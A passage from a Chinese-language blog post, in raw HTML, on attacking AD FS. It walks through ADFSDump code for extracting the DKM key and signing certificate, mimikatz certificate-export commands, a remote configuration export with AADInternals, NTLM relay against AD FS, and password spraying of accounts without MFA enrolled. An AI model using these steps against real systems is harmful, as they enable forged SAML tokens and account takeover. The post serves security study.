0);">PropertiesToLoad</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">Add</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"thumbnailphoto"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                        <span style="box-sizing: border-box;color: rgb(0, 0, 0);">foreach</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">SearchResult</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">resEnt</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">in</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">mySearcher</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">FindAll</span>())</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                        {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                            <span style="box-sizing: border-box;color: rgb(0, 0, 0);">byte</span>[] <span style="box-sizing: border-box;color: rgb(0, 0, 0);">privateKey</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">byte</span>[])<span style="box-sizing: border-box;color: rgb(0, 0, 0);">resEnt</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">Properties</span>[<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"thumbnailphoto"</span>][<span style="box-sizing: border-box;color: rgb(17, 102, 68);">0</span>];</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                            <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">convertedPrivateKey</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">BitConverter</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">ToString</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">privateKey</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                            <span style="box-sizing: border-box;color: rgb(0, 0, 0);">Console</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">WriteLine</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"[-] Private Key: {0}\r\n\r\n"</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">convertedPrivateKey</span>);</span></pre><p cid="n116" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">这个属性名称有点怪？因为在 VMware Identity Manager中这个属性真的是用来放照片链接的</span></p><p cid="n117" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">然后连接到wid读数据库中的身份信息和pfx（加密签名密钥）</span></p><pre spellcheck="false" lang="c++" cid="n118" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">public</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">static</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">class</span> <span style="box-sizing: border-box;color: rgb(0, 0, 255);">DatabaseReader</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">        <span style="box-sizing: border-box;color: rgb(119, 0, 136);">private</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">const</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">WidConnectionString</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"Data Source=np:\\\\.\\pipe\\microsoft##wid\\tsql\\query;Integrated Security=True"</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">        <span style="box-sizing: border-box;color: rgb(119, 0, 136);">private</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">const</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">WidConnectionStringLegacy</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"Data Source=np:\\\\.\\pipe\\MSSQL$MICROSOFT##SSEE\\sql\\query"</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">        <span style="box-sizing: border-box;color: rgb(119, 0, 136);">private</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">const</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">ReadEncryptedPfxQuery</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"SELECT ServiceSettingsData from {0}.IdentityServerPolicy.ServiceSettings"</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">        <span style="box-sizing: border-box;color: rgb(119, 0, 136);">private</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">static</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">readonly</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span>[] <span style="box-sizing: border-box;color: rgb(0, 0, 0);">BuiltInScopes</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> { <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"SelfScope"</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"ProxyTrustProvisionRelyingParty"</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"Device Registration Service"</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"UserInfo"</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"PRTUpdateRp"</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"Windows Hello - Certificate Provisioning Service"</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"urn:AppProxy:com"</span> };</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">        <span style="box-sizing: border-box;color: rgb(119, 0, 136);">private</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">const</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">ReadScopePolicies</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"SELECT SCOPES.ScopeId,SCOPES.Name,SCOPES.WSFederationPassiveEndpoint,SCOPES.Enabled,SCOPES.SignatureAlgorithm,SCOPES.EntityId,SCOPES.EncryptionCertificate,SCOPES.MustEncryptNameId, SCOPES.SamlResponseSignatureType, SCOPES.ParameterInterface, SAML.Binding, SAML.Location,POLICYTEMPLATE.name, POLICYTEMPLATE.PolicyMetadata, POLICYTEMPLATE.InterfaceVersion, SCOPEIDS.IdentityData FROM {0}.IdentityServerPolicy.Scopes SCOPES LEFT OUTER JOIN {0}.IdentityServerPolicy.ScopeAssertionConsumerServices SAML ON SCOPES.ScopeId = SAML.ScopeId LEFT OUTER JOIN {0}.IdentityServerPolicy.PolicyTemplates POLICYTEMPLATE ON SCOPES.PolicyTemplateId = POLICYTEMPLATE.PolicyTemplateId LEFT OUTER JOIN {0}.IdentityServerPolicy.ScopeIdentities SCOPEIDS ON SCOPES.ScopeId = SCOPEIDS.ScopeId"</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">        <span style="box-sizing: border-box;color: rgb(119, 0, 136);">private</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">const</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">ReadScopePoliciesLegacy</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"SELECT SCOPES.ScopeId,SCOPES.Name,SCOPES.WSFederationPassiveEndpoint,SCOPES.Enabled,SCOPES.SignatureAlgorithm,SCOPES.EntityId,SCOPES.EncryptionCertificate,SCOPES.MustEncryptNameId,SCOPES.SamlResponseSignatureType, SAML.Binding, SAML.Location, SCOPEIDS.IdentityData FROM {0}.IdentityServerPolicy.Scopes SCOPES LEFT OUTER JOIN {0}.IdentityServerPolicy.ScopeAssertionConsumerServices SAML ON SCOPES.ScopeId = SAML.ScopeId LEFT OUTER JOIN {0}.IdentityServerPolicy.ScopeIdentities SCOPEIDS ON SCOPES.ScopeId = SCOPEIDS.ScopeId"</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">        <span style="box-sizing: border-box;color: rgb(119, 0, 136);">private</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">const</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">ReadRules</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"Select SCOPE.ScopeId, SCOPE.name, POLICIES.PolicyData,POLICIES.PolicyType, POLICIES.PolicyUsage FROM {0}.IdentityServerPolicy.Scopes SCOPE INNER JOIN {0}.IdentityServerPolicy.ScopePolicies SCOPEPOLICIES ON SCOPE.ScopeId = SCOPEPOLICIES.ScopeId INNER JOIN {0}.IdentityServerPolicy.Policies POLICIES ON SCOPEPOLICIES.PolicyId = POLICIES.PolicyId"</span>;</span></pre><p cid="n119" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">之后就可以用ADFSpoof根据pfx、私钥、和用户信息生成身份验证SAML请求ADFS的SamlResponseServlet接口获取权限</span></p><p cid="n120" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">ADFSDump：</span><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://github.com/mandiant/ADFSDump/" target="_blank">https://github.com/mandiant/ADFSDump/</a></span></p><p cid="n121" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">ADFSpoof：</span><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://github.com/mandiant/ADFSpoof" target="_blank">https://github.com/mandiant/ADFSpoof</a></span></p><p cid="n122" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">如果使用ADFSDump导出证书为空，可以使用mimikatz导出</span></p><pre spellcheck="false" lang="" cid="n123" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">mimikatz @crypto::certificates /systemstore:local_machine /store:my</span></pre><p cid="n124" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">如果系统不支持使用CryptoAPI导出证书</span></p><p cid="n125" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">可以使用mimikatz打capi补丁然后导出</span></p><pre spellcheck="false" lang="" cid="n126" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">mimikatz @crypto::capi</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">crypto::certificates /systemstore:local_machine /store:my /export</span></pre><p cid="n127" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">将 ADFSDump 中的证书值与mimikatz的证书的值进行比较来确定 ADFS 使用的是哪个证书</span></p><h2 cid="n128" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">DSync-ADFS</span></h2><p cid="n129" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">对于远程mssql的数据库连接ADFSDump没有实现，不过我们可以用</span></p><p cid="n130" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://github.com/Gerenios/AADInternals" target="_blank">https://github.com/Gerenios/AADInternals</a></span></p><p cid="n131" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">就像针对ldap的数据库可以使用主从备份一样，我们也可以模拟ADFS的辅助数据库来同步数据,需要ADFS服务账户的密码/hash和guid</span></p><pre spellcheck="false" lang="powershell" cid="n132" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(170, 85, 0);"># Export configuration remotely and store to variable</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(0, 85, 170);">$ADFSConfig</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;">Export-AADIntADFSConfiguration</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">-</span><span style="box-sizing: border-box;">Hash</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"6e36047d34057fbb8a4e0ce8933c73cf"</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">-</span><span style="box-sizing: border-box;">SID</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"S-1-5-21-1332519571-494820645-211741994-8710"</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">-</span><span style="box-sizing: border-box;">Server</span> <span style="box-sizing: border-box;">sts</span><span style="box-sizing: border-box;">.</span><span style="box-sizing: border-box;">company</span><span style="box-sizing: border-box;">.</span><span style="box-sizing: border-box;">com</span></span></pre><h2 cid="n133" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">ADFS relay</span></h2><p cid="n134" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">ADFS 允许客户端通过 WIA 机制使用 NTLM 身份验证进行身份验证，认证流程和NTLM协议认证流程基本是一样的，客户端发起协商请求，服务端提供challage，然后客户端用用户密码加密过的认证信息去认证，服务端通过验证请求后发送身份cookie</span></p><pre spellcheck="false" lang="" cid="n135" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">WIA ：集成 Windows 身份验证（NTLM 或 Windows NT 质询/响应验证）</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">默认情况下，Windows集成身份验证 (WIA) 在 Windows Server Active Directory 联合身份验证服务 (AD FS) 中启用，以便在组织内部网络 (Intranet) 中为使用浏览器进行身份验证的任何应用程序启用身份验证请求。 例如，可以使用 WS-Federation 或 SAML 协议以及使用 OAuth 协议的丰富应用程序基于浏览器的应用程序。 WIA 为最终用户提供无缝登录应用程序，而无需手动输入其凭据。 但是，某些设备和浏览器无法支持 WIA，因此来自这些设备的身份验证请求会失败。 此外，某些与 NTLM 协商的浏览器上的经验是不可取的。 建议的方法是回退到此类设备和浏览器的基于表单的身份验证。</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">Windows Server 2016 和 Windows Server 2012 R2 中的 AD FS 使管理员能够配置支持回退到基于表单的身份验证的用户代理列表。 可通过两种配置实现回退：</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">commandlet 的 Set-ADFSPropertiesWIASupportedUserAgentStrings 属性</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">commandlet 的 Set-AdfsGlobalAuthenticationPolicyWindowsIntegratedFallbackEnabled 属性</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">WIASupportedUserAgentStrings 定义支持 WIA 的用户代理。 AD FS 在浏览器或浏览器控件中执行登录名时分析用户代理字符串。 如果用户代理字符串的组件与 WIASupportedUserAgentStrings 属性中配置的用户代理字符串的任何组件不匹配，则 AD FS 将回退到提供基于表单的身份验证，前提是 WindowsIntegratedFallbackEnabled 标志设置为 True。</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">Set-AdfsGlobalAuthenticationPolicy -WindowsIntegratedFallbackEnabled $true</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">可以将 Chrome 或其他用户代理添加到支持 WIA 的 AD FS 配置。 这样就可以无缝登录到应用程序，而无需在访问受 AD FS 保护的资源时手动输入凭据。 按照以下步骤在 Chrome 上启用 WIA：</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">在 AD FS 配置中，在基于Windows的平台上为 Chrome 添加用户代理字符串：</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">Set-AdfsProperties -WIASupportedUserAgents (Get-ADFSProperties | Select -ExpandProperty WIASupportedUserAgents) + "Mozilla/5.0 (Windows NT)"</span></pre><p cid="n136" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">ADFS relay攻击成功的前提是</span></p><ul class="list-paddingleft-1" cid="n137" mdtype="list" data-mark="+" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n139" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">关闭EPA</span></p></li></ul><pre spellcheck="false" lang="" cid="n140" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">epa就是微软官方提供的防止中间人攻击的安全机制，客户端-攻击者 TSL 通道的 CBT 与发送给服务器的授权信息合并。 识别 CBT 的服务器将客户端身份验证信息中所含的 CBT（与客户端-攻击者通道相对应）与附加到攻击者-服务器通道的 CBT 进行比较。 CBT 特定于通道目标，因此客户端-攻击者 CBT 与攻击者-服务器 CBT 不匹配。 这样，服务器就可检测 MITM 攻击并拒绝身份验证请求。</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">服务器可以具有以下级别的保护：</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">无。 不执行任何通道绑定验证。 这是所有尚未更新的服务器的行为。</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">部分支持。 所有已更新的客户端必须向服务器提供通道绑定信息。 尚未更新的客户端无需执行此操作。 这是一个中间选项，可以实现应用程序兼容。</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">已满。 所有客户端都必须提供通道绑定信息。 服务器拒绝来自不提供通道绑定信息的客户端的身份验证请求。</span></pre><p cid="n141" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">epa是默认开启的，所以一般需要adfs和验证服务器之间有流量转发设备（负载均衡、反向代理等）使管理员配置时关闭epa，达成以上两个条件后就可以启动中继脚本（</span><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://github.com/praetorian-inc/ADFSRelay" target="_blank">https://github.com/praetorian-inc/ADFSRelay</a></span><span md-inline="plain" style="box-sizing: border-box;">），抓取受害者身份验证时的cookie从而获取云控制台权限。</span></p><h2 cid="n142" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">一个trick</span></h2><p cid="n143" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">ADFS有个很奇怪的地方，如果管理员开启MFA，但用户还没有设置验证邮箱或手机，那么用户账户在使用正确的账号密码登录后就不再需要管理员对用户设置的MFA信息做审核，用户账户可以直接添加任意认证信息只要收到验证码完成认证即可。也就是说我们可以对正常不会使用ADFS登录的AD域内机器账户或服务账户进行密码喷射，然后手动设置认证信息，即可完成域账号登录。同时遇到MFA也可以思考以下2个问题</span></p><ul class="list-paddingleft-1" cid="n144" mdtype="list" data-mark="+" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n146" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">真的所有用户都开启了MFA策略吗？</span></p></li><li style="box-sizing: border-box;"><p cid="n148" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">真的所有用户都完成了MFA的设置吗？</span></p></li></ul><p cid="n149" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">可以想一下管理员开启MFA时废弃账号、离职员工的账号真的清退干净了吗？服务账号有设置好权限吗？</span></p><h2 cid="n150" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">参考文章</span></h2><p cid="n151" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://jamescoote.co.uk/ADSFDump-without-WID-and-with-nonexportable-certificates/" target="_blank">https://jamescoote.co.uk/ADSFDump-without-WID-and-with-nonexportable-certificates/</a></span></p><p cid="n152" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://www.mandiant.com/resources/blog/abusing-replication-stealing-adfs-secrets-over-the-network" target="_blank">https://www.mandiant.com/resources/blog/abusing-replication-stealing-adfs-secrets-over-the-network</a></span></p><p cid="n153" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a 